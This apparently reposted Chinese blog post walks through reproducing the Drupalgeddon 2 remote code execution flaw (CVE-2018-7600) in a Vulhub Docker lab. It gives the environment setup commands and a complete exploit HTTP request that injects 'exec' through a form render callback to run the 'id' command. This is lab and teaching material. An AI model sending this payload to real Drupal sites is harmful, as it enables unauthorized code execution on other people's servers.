您的位置:首页 > 编程语言

利用Vulnhub复现漏洞 - Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

2019-07-02 15:19 2381 查看

Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

  • 复现漏洞
  • 漏洞复现
  • Vulnhub官方复现教程

    https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md

    漏洞原理

    Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞。相关分析如下:

    复现漏洞

    启动环境

    https://blog.csdn.net/JiangBuLiu/article/details/93853056
    进入路径为

    cd /root/vulhub/drupal/CVE-2018-7600

    搭建及运行漏洞环境:

    docker-compose build && docker-compose up -d

    用时:三分钟

    环境启动后,访问http://your-ip:8080/将会看到drupal的安装页面,选择英文
    不然会需要下载语言包
    一路默认配置下一步安装。
    因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

    漏洞复现

    参考[a2u/CVE-2018-7600],我们向安装完成的drupal发送如下数据包:

    POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
    Host: your-ip:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    
    form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

    成功执行代码,这个代码最终执行了id命令:

    内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
    标签: 
    相关文章推荐